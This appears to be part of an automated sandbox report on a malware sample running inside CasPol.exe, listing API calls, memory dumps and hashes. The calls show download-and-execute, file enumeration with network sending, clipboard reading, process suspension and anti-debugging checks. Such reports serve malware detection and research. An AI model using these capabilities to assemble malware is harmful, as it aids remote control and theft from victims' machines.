                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                          • String ID: SETTINGS
                                                                                                                                                                          • API String ID: 3473537107-594951305
                                                                                                                                                                          • Opcode ID: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                                                                                                                                                          • Instruction ID: e87eb13c1a863bb520e8110b03cd0e44f0123e9e346c2db4eb51eb31bea7c0b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                                                                                                                                                          • Instruction Fuzzy Hash: 23E01276600B21EBDB211FB1AC8CD467F25E7C9B533140075FA0582271CB758840DA58
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                                                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1157919129-0
                                                                                                                                                                          • Opcode ID: 1c61502dcddb6f1c338862b57ec77496ec5ca45208db4d87175f1e85b34456af
                                                                                                                                                                          • Instruction ID: 095255599cc0af9be2c5710cd9f248f54336688560ad7ccdcde9a73cf5c292f5
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c61502dcddb6f1c338862b57ec77496ec5ca45208db4d87175f1e85b34456af
                                                                                                                                                                          • Instruction Fuzzy Hash: CB813C729001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1771804793-0
                                                                                                                                                                          • Opcode ID: 230b96d798be498e9ef8a6d6c6662c70d8d15ac88f5c0912f345ddef500bd3b7
                                                                                                                                                                          • Instruction ID: 967e03bdddb214c30410211942a515ee3c29859e80101891d5c5db132fd2cd64
                                                                                                                                                                          • Opcode Fuzzy Hash: 230b96d798be498e9ef8a6d6c6662c70d8d15ac88f5c0912f345ddef500bd3b7
                                                                                                                                                                          • Instruction Fuzzy Hash: 94517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB99
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DownloadExecuteFileShell
                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                                                                                          • API String ID: 2825088817-4197237851
                                                                                                                                                                          • Opcode ID: 1598f39350d4de776a2c4df0b22db1491b56135c48faa30bf3a2a552642789bc
                                                                                                                                                                          • Instruction ID: e12f74d6213dd3660153607da8c9b98f7978e2d251169c1aa1e307be856b925d
                                                                                                                                                                          • Opcode Fuzzy Hash: 1598f39350d4de776a2c4df0b22db1491b56135c48faa30bf3a2a552642789bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 1461C471A0830166CA14FB76C8569BE37A59F81758F40093FF9427B2D2EE3C9905C79B
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$FirstNextsend
                                                                                                                                                                          • String ID: hPG$hPG
                                                                                                                                                                          • API String ID: 4113138495-4177492676
                                                                                                                                                                          • Opcode ID: b2caad42cb92f6822f0d3a262e4a0aa5abacc01a08b3a6296b6e41a9c19c353f
                                                                                                                                                                          • Instruction ID: abfa5a3658aec55442980c0effbd4670719d50d4d7308f226e3cac976b3f196c
                                                                                                                                                                          • Opcode Fuzzy Hash: b2caad42cb92f6822f0d3a262e4a0aa5abacc01a08b3a6296b6e41a9c19c353f
                                                                                                                                                                          • Instruction Fuzzy Hash: CB2195315082019BC314FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA09C65B
                                                                                                                                                                          APIs
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                                                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                                                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                          • API String ID: 4127273184-3576401099
                                                                                                                                                                          • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                                                          • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                                                                                          • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                                                          • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                          • String ID: p'E$JD
                                                                                                                                                                          • API String ID: 1084509184-908320845
                                                                                                                                                                          • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                                                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                                                                                          • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                                                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2829624132-0
                                                                                                                                                                          • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                                                          • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                                                          • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                          • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                                                          • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                                                                                                          • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                                                          • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                          • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                          • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                          • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                          • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                          • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                          • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2058664381-0
                                                                                                                                                                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                                                                                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                                                                                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3614150671-0
                                                                                                                                                                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                          • Instruction ID: dbaabbb0ea2570487ff62d8cf89bd30b477e7113d13ca21b8680662729a76e86
                                                                                                                                                                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                          • Instruction Fuzzy Hash: 66D05E36204121E3C320176A7C0CD97AD68DBC5AA2705412AF804C26649A60CC0186E4
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                                                                                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1999457699-0
                                                                                                                                                                          • Opcode ID: 15699d522662e94a36dc9f627e6c03bf4f255e4023340f214c75571920ff47a0
                                                                                                                                                                          • Instruction ID: 1e4755145751be78863ec26184204985b99a3e1fec7ed1e2fa2d7a7f5aac3163
                                                                                                                                                                          • Opcode Fuzzy Hash: 15699d522662e94a36dc9f627e6c03bf4f255e4023340f214c75571920ff47a0
                                                                                                                                                                          • Instruction Fuzzy Hash: 73D05E36104121E3C6211B6A7C0CD97AD68DFC5AA2705412AF904D26509A20CC0186E4
                                                                                                                                                                          APIs
                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                          • String ID: MZ@
                                                                                                                                                                          • API String ID: 2325560087-2978689999
                                                                                                                                                                          • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                                          • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                                          • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .
                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                          • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                                                          • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                                                                                                          • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                                                          • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .
